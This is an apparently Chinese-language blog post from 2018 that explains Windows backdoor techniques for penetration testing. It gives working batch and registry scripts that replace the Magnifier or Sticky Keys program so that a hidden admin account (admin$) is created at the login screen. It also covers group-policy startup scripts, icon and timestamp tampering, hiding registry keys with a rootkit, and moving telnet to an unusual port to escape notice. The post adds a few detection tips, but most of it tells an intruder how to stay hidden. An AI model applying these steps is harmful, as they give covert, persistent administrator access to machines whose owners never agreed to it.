

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon/warning.png">
  <link rel="icon" href="/img/icon/warning.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="0X00 前言之前写过一篇关于windows 影子账户的添加方法的文章，这其实只是一种最简单的方式，这种方式只能允许你进入Windows之后手动添加，万一被聪明的管理员发现并删除了，并且又改了登录密码就会非常之难受，于是又参考了一些文章，想再补充一下后门木马的建立方式，并对我之前的那个影子账户作进一步的升级。">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows 常见后门添加方法再探究">
<meta property="og:url" content="http://example.com/2018/07/29/Windows%20%E5%B8%B8%E8%A7%81%E5%90%8E%E9%97%A8%E6%B7%BB%E5%8A%A0%E6%96%B9%E6%B3%95%E5%86%8D%E6%8E%A2%E7%A9%B6/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0X00 前言之前写过一篇关于windows 影子账户的添加方法的文章，这其实只是一种最简单的方式，这种方式只能允许你进入Windows之后手动添加，万一被聪明的管理员发现并删除了，并且又改了登录密码就会非常之难受，于是又参考了一些文章，想再补充一下后门木马的建立方式，并对我之前的那个影子账户作进一步的升级。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/telnet1.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/telnet2.png">
<meta property="article:published_time" content="2018-07-29T18:05:18.000Z">
<meta property="article:modified_time" content="2025-01-24T15:19:13.387Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透测试 windows 后门">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/telnet1.png">
  
  
  
  <title>Windows 常见后门添加方法再探究 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/macpanel.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 60vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>K0rz3n&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/banner/icemountain.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Windows 常见后门添加方法再探究"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2018-07-29 19:05" pubdate>
          July 29, 2018 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.2k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          27 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Windows 常见后门添加方法再探究</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="0X00-前言"><a href="#0X00-前言" class="headerlink" title="0X00 前言"></a><strong>0X00 前言</strong></h2><p>之前写过一篇关于windows 影子账户的添加方法的文章，这其实只是一种最简单的方式，这种方式只能允许你进入Windows之后手动添加，万一被聪明的管理员发现并删除了，并且又改了登录密码就会非常之难受，于是又参考了一些文章，想再补充一下后门木马的建立方式，并对我之前的那个影子账户作进一步的升级。</p>
<span id="more"></span>
<h2 id="0X01-后门是什么"><a href="#0X01-后门是什么" class="headerlink" title="0X01 后门是什么"></a><strong>0X01 后门是什么</strong></h2><p>其实后门这个词非常的形象，如果说把服务器看成是一个房间，管理员每次都是根据口令从正门进去的话，后门就是入侵者在入侵以后悄悄挖的地道（可能在床底下，可能在衣柜里，反正就是不让管理员发现），目的也很明确，就是入侵者希望绕过正门，从自己挖的地道进去。</p>
<h2 id="0X02-后门的本质"><a href="#0X02-后门的本质" class="headerlink" title="0X02 后门的本质"></a><strong>0X02 后门的本质</strong></h2><p>记得在我的上一篇文章<a target="_blank" rel="noopener" href="http://www.k0rz3n.com/2018/06/26/windows%E6%B8%97%E9%80%8F%E4%B8%AD%E5%90%8E%E9%97%A8%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%96%B9%E6%B3%95%E6%8E%A2%E7%A9%B6/">windows渗透中后门用户的添加方法探究 </a>中我说过，后门的本质就是添加用户（<strong>是在未登录的情况下添加</strong>）没有用户是不可能登录进去的，所以接下来我所有的操作都是以这个为目标的。</p>
<h2 id="0X03-放大镜后门"><a href="#0X03-放大镜后门" class="headerlink" title="0X03 放大镜后门"></a><strong>0X03 放大镜后门</strong></h2><p>别被名字误导了，不是这个后门能实现放大镜的作用，而是我们要利用放大镜这个能<strong>在未登录的情况下</strong>使用快捷方式运行的应用程序来创建我们的用户，从而达到入侵的目的。</p>
<h3 id="1-基本原理"><a href="#1-基本原理" class="headerlink" title="1.基本原理"></a><strong>1.基本原理</strong></h3><p>放大镜在windows系统中的应用程序名称为 magnify.exe，在Windows系统未登录的时候使用 Win+U就能调用出来，我们会使用我们精心构造的magnify.exe的同名文件替换系统本身的放大镜程序（这个同名文件是由我们自己编写的bat脚本转化成exe实现的）。我们的这个文件的功能就是添加用户并且能在最后打开放大镜，避免引起管理员使用时的怀疑。</p>
<h3 id="2-脚本编写"><a href="#2-脚本编写" class="headerlink" title="2.脚本编写"></a><strong>2.脚本编写</strong></h3><p>因为现在主流的系统都是64位的，所以我们就替换我们system32目录下的就可以了</p>
<p>replacement.bat</p>
<pre><code class="hljs">@echo off
copy %Windir%\system32\magnify.exe nagnify.exe ::备份原始放大镜程序，以备后面调用
replace.exe %Windir%\magnify.exe %Windir%\system32 ::将自己的程序伪装成放大镜程序
exit 
</code></pre>
<p><strong>（以上脚本只是提供一个思路，我个人测试过程中发现这个脚本的运行会受到权限的严重限制，导致没法成功实现replace功能，最好的方法就是在获取system32中的mangify.exe 的管理员权限以后直接手动复制和粘贴）<br>右键获取管理员权限需要通过修改注册表实现，以下就是提升权限的脚本</strong></p>
<p>promote.reg</p>
<pre><code class="hljs">Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]
@=&quot;管理员取得所有权&quot;
&quot;NoWorkingDirectory&quot;=&quot;&quot;
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@=&quot;cmd.exe /c takeown /f \&quot;%1\&quot; &amp;&amp; icacls \&quot;%1\&quot; /grant administrators:F&quot;
&quot;IsolatedCommand&quot;=&quot;cmd.exe /c takeown /f \&quot;%1\&quot; &amp;&amp; icacls \&quot;%1\&quot; /grant administrators:F&quot;
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@=&quot;管理员取得所有权&quot;
&quot;NoWorkingDirectory&quot;=&quot;&quot;
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@=&quot;cmd.exe /c takeown /f \&quot;%1\&quot; &amp;&amp; icacls \&quot;%1\&quot; /grant administrators:F&quot;
&quot;IsolatedCommand&quot;=&quot;cmd.exe /c takeown /f \&quot;%1\&quot; &amp;&amp; icacls \&quot;%1\&quot; /grant administrators:F&quot;
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@=&quot;管理员取得所有权&quot;
&quot;NoWorkingDirectory&quot;=&quot;&quot;
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@=&quot;cmd.exe /c takeown /f \&quot;%1\&quot; /r /d y &amp;&amp; icacls \&quot;%1\&quot; /grant administrators:F /t&quot;
&quot;IsolatedCommand&quot;=&quot;cmd.exe /c takeown /f \&quot;%1\&quot; /r /d y &amp;&amp; icacls \&quot;%1\&quot; /grant administrators:F /t&quot;
</code></pre>
<p>magnify.bat</p>
<pre><code class="hljs">@echo off
net user admin$ admin_888 /add  2&gt;nul
net localgroup administrators admin$ /add 2&gt;nul //创建用户
start %Windir%\system32\nagnify.exe 2&gt;nul //调用真正的放大镜以防露出破绽
exit 
</code></pre>
<h3 id="3-注意"><a href="#3-注意" class="headerlink" title="3.注意"></a><strong>3.注意</strong></h3><p>1.这里的 2&gt;nul 是将错误输出屏蔽<br>2.这里的转换工具推荐使用 bat to exe 这个工具，按照原来的逻辑就是使用工具将上面的bat脚本转化成exe文件，放在该放的位置，然后等我们运行放大镜就行了。<br>3.为了更好地隐藏我们需要提取系统原有的图标，然后在转化成 exe文件的时候爆把这个图标也选择上。（这里的提取工具推荐iconmaster）<br>4.由于我们的代码比较少， 加上图标也只有500多K,而原始程序有600多K，我们甚至为了隐藏更加彻底添加一些冗余代码。<br>5.还有一个非常重要的东西就是修改时间，改成系统原始的时间（推荐工具 NewFileTime_x64）</p>
<h3 id="4-攻击流程"><a href="#4-攻击流程" class="headerlink" title="4.攻击流程"></a><strong>4.攻击流程</strong></h3><p>（1）备份magnify.exe 为 nagnify.exe 到当前目录下<br>（2）将我们的添加用户和调用备份的放大镜程序的bat脚本转化成magnify.exe文件(要转化成64位的否则会无法执行)，然后替换原来的system32下的magnify.exe<br>（3）运行magnify.exe 即可完成添加用户和打开放大镜的操作</p>
<h2 id="0X04-Shift后门"><a href="#0X04-Shift后门" class="headerlink" title="0X04 Shift后门"></a><strong>0X04 Shift后门</strong></h2><p>shift 后门和放大镜后门是一样的操作，只是文件替换变化成了setch.exe（这个更加隐蔽一些）</p>
<h2 id="0X05-组策略后门"><a href="#0X05-组策略后门" class="headerlink" title="0X05 组策略后门"></a><strong>0X05 组策略后门</strong></h2><h3 id="1-什么是组策略"><a href="#1-什么是组策略" class="headerlink" title="1.什么是组策略"></a><strong>1.什么是组策略</strong></h3><p>我们知道，注册表时每个windows系统的灵魂，他统筹管理着windows系统的一切配置，没有了注册表系统就是一块废铁，你什么文件也打不开。组策略是windows专业版以上拥有的一个快速管理注册表的工具，是管理员管理系统的强大的工具（当然也是黑客留后门的强有力手段）。</p>
<h3 id="2-组策略作用"><a href="#2-组策略作用" class="headerlink" title="2.组策略作用"></a><strong>2.组策略作用</strong></h3><p>组策略对本地计算机可以进行两个方面的设置：本地计算机配置和本地用户配置。所有策略的设置都将保存到注册表的相关项目中。对计算机策略的设置保存到注册表的HKEY_LOCAL_MACHINE的相关项中，对用户的策略设置将保存到HKEY_CURRENT_USER相关项中。</p>
<p>例如，可使用“组策略”从桌面删除图标、自定义“开始”菜单并简化“控制面板”。此外,还可添加在计算机上（在计算机启动或停止时，以及用户登录或注销时）运行的脚本，甚至可配置Internet Explorer。</p>
<h3 id="3-组策略开启"><a href="#3-组策略开启" class="headerlink" title="3.组策略开启"></a><strong>3.组策略开启</strong></h3><p>运行中输入 gpedit.msc</p>
<p>开启后，我们能看到一个是计算机配置，另一个是用户配置，计算机配置是针对所有用户的但是用户配置是针对当前用户。</p>
<h3 id="4-如何添加后门"><a href="#4-如何添加后门" class="headerlink" title="4.如何添加后门"></a><strong>4.如何添加后门</strong></h3><p>因为组策略能够修改注册表，随系统启动而运行，还能设置开关机启动项，让程序在关机的时候运行，这样的操作更加难以被发现，即使是管理员以为自己删除了木马，一旦他关机，木马又会被激活。</p>
<p>设置的地点在 组策略 &gt; 计算机配置 &gt; windows 设置 &gt; 脚本（启动、关机）</p>
<p>编写脚本a.bat用来创建隐藏账户</p>
<pre><code class="hljs">@echo off
net user admin$ admin_888 /add  2&gt;nul
net localgroup administrators admin$ /add 2&gt;nul //创建用户
</code></pre>
<h3 id="5-如何防范"><a href="#5-如何防范" class="headerlink" title="5.如何防范"></a><strong>5.如何防范</strong></h3><p>多多关注开关机启动项：</p>
<p>system32\GroupPolicy\Machine\Scripts\Startup 和system32\GroupPolicy\Machine\Scripts\Shutdown目录看看有没有可疑的脚本</p>
<h2 id="0X06-rootkit-后门"><a href="#0X06-rootkit-后门" class="headerlink" title="0X06 rootkit 后门"></a><strong>0X06 rootkit 后门</strong></h2><h3 id="1-rootkit-是什么"><a href="#1-rootkit-是什么" class="headerlink" title="1.rootkit 是什么"></a><strong>1.rootkit 是什么</strong></h3><p>在悬念迭起的中外谍战片里，对战双方中的一派势力通常会派遣特工人员潜伏到对手阵营中。这名卧底人员良好的伪装使得对手对此长时间毫无察觉；为了能够长期潜伏他不贸然采取高风险行为以免过早暴露自己；他赢得敌人的信任并因此身居要职，这使得他能够源源不断地获取重要情报并利用其独特渠道传送回去。</p>
<p>从某种意义上说这位不速之客就是Rootkit——持久并毫无察觉地驻留在目标计算机中，对系统进行操纵、并通过隐秘渠道收集数据的程序。Rootkit的三要素就是：隐藏、操纵、收集数据。（以上来源于百度百科）</p>
<h3 id="2-常见的例子"><a href="#2-常见的例子" class="headerlink" title="2.常见的例子"></a><strong>2.常见的例子</strong></h3><p>在我的前面的一篇文章 <a target="_blank" rel="noopener" href="http://www.k0rz3n.com/2018/06/26/windows%E6%B8%97%E9%80%8F%E4%B8%AD%E5%90%8E%E9%97%A8%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%96%B9%E6%B3%95%E6%8E%A2%E7%A9%B6/">windows渗透中后门用户的添加方法探究 </a>我其实已经介绍了两种方法，一个就是创建admin$ 这种使用命令行看不出来的用户，另一种就是使用影子账户这种只能在注册表中看到的用户，但是现在我们可以对其进行更进一步的升级。</p>
<p>使用rootkit工具可以实现在注册表中也能隐藏，而且这种隐藏是很难被发现的，除非使用特别的查杀工具<br>我们隐藏注册表键值只需其中的两个文件， hxdef100.exe和 hxdef100.ini。其中 hxdef100.ini 是配置文件，hxdef100.exe 是程 序文件。打开 hxdef100.ini 文件定位到 [HiddenRegKeys]项下，添加我们要隐藏的 注册表键值 admin$和 000003EF即用户在注册表的项然后保存退出。 然后双击运行 hxdef100.exe，可以看到 admin$用户在注册表中的键值 “消失” 了，同时这两个文件也 “不见”了。这样我们就利用 RootKit 实现了高级管理员用 户的彻底隐藏，管理员是无从知晓在系统中存在一个管理员用户的。</p>
<p>（经过我的实验，应该是由目前的操作系统版本更新的原因，原来的老的工具已经不再适用，如果有其他的类似工具，希望各位师傅们不吝赐教）</p>
<h3 id="3-防范"><a href="#3-防范" class="headerlink" title="3.防范"></a><strong>3.防范</strong></h3><p>rootkit 是驱动级的后门，通过肉眼查杀相对比较困难，推荐大家使用工具来实现</p>
<h2 id="0X07-Telnet-后门"><a href="#0X07-Telnet-后门" class="headerlink" title="**0X07 Telnet 后门 **"></a>**0X07 Telnet 后门 **</h2><h3 id="1-简介"><a href="#1-简介" class="headerlink" title="1.简介"></a><strong>1.简介</strong></h3><p>telnet 是一个命令行下的远程管理工具，这个服务的默认端口是23，但是由于其传输的明文性，windows命令行的不实用性，致使大多数管理员都不采用这种方式来远程管理服务器，而是转向了更为方便直观的3389 也就是远程桌面来管理远程服务器。但是对于黑客来讲命令行什么的都是小事情，关键是这种方式要比直接用3389登录隐蔽的多。</p>
<p>但是管理员也不傻，正常的管理员都应该知道23端口对应的是telnet，如果哪天管理员无意间发现23端口打开了，那么很容易就会联想到自己的服务器被黑客入侵了。因此我们想要隐藏就必须要将这个默认的端口修改成一个比较随意的端口。</p>
<h3 id="2-开启方式"><a href="#2-开启方式" class="headerlink" title="2.开启方式"></a><strong>2.开启方式</strong></h3><p>我以 windows server 2008 r2 为例说一下telnet的开启方式</p>
<p>1）开始 &gt; 管理工具 &gt; 服务器管理 &gt; 功能 &gt; 添加功能勾选 telnet 服务端和客户端<br>2）开始 &gt; 管理工具 &gt; 服务器管理 &gt; 配置 &gt; 高级安全windows防火墙 &gt; 入站规则 允许telnet 访问<br>3）开始 &gt; 管理工具 &gt; 服务器管理 &gt; 配置 &gt; 服务 开启telnet </p>
<p>完成这三部就基本大功告成了<br>检测方法：命令行输入 netstat -ano 看一下是不是23端口正在监听</p>
<p>如下图：</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/telnet1.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h3 id="3-修改端口"><a href="#3-修改端口" class="headerlink" title="3.修改端口"></a><strong>3.修改端口</strong></h3><p>直接在服务器上修改</p>
<pre><code class="hljs">tlntadmn config port=800
</code></pre>
<p>再检查一下端口，如下图可以看到已经变成了800</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/telnet2.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h3 id="注意："><a href="#注意：" class="headerlink" title="注意："></a><strong>注意：</strong></h3><p>到现在为止你依然无法通过800端口实现telnet 的连接，因为windows 2008 server r2 是有防火墙的，我们必须要新建一个入站策略才能实现登陆</p>
<p>Windows 防火墙 &gt; 入站规则 &gt; 新建规则 &gt; 自定义 &gt; 所有程序 &gt; TCP、特定端口、800 &gt; 其它默认</p>
<p>接着我们就能通过 800 端口连接服务器的telnet 了</p>
<h2 id="0X08-嗅探后门"><a href="#0X08-嗅探后门" class="headerlink" title="0X08 嗅探后门"></a><strong>0X08 嗅探后门</strong></h2><p>这种后门并不会创建账号，而是在服务器上安装一个嗅探程序，不定期的向远程的黑客发送服务器的信息，包括管理员的账号密码等敏感信息，由于不添加用户，隐蔽性强，不容易被发现。</p>
<p>这种后门想要检测，只能通过专业的检测工具或者审查安全日志来查看有没有可疑的登录记录</p>
<h2 id="0X09-总结"><a href="#0X09-总结" class="headerlink" title="0X09 总结"></a><strong>0X09 总结</strong></h2><p>我参考的文章由于年代比较老旧，经过我的测试只有部分的功能能够成功实现，还有很多由于工具与系统的不兼容已经失效，但是还是能给我们系统一些好的思路和技巧，工具还可以再开发的嘛。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="category-chain-item">渗透测试</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-windows-%E5%90%8E%E9%97%A8/" class="print-no-link">#渗透测试 windows 后门</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Windows 常见后门添加方法再探究</div>
      <div>http://example.com/2018/07/29/Windows 常见后门添加方法再探究/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>July 29, 2018</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - Non-commercial">
                    <i class="iconfont icon-cc-nc"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - Share-alike">
                    <i class="iconfont icon-cc-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2018/07/31/Windows%20Server%202008%20R2%20ftp%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BA%E8%B8%A9%E5%9D%91/" title="Windows Server 2008 R2 ftp服务器搭建踩坑">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Windows Server 2008 R2 ftp服务器搭建踩坑</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2018/07/25/%E6%89%B9%E5%A4%84%E7%90%86%E6%96%87%E4%BB%B6%E7%BC%96%E5%86%99%E6%95%B4%E7%90%86/" title="批处理文件编写整理">
                        <span class="hidden-mobile">批处理文件编写整理</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
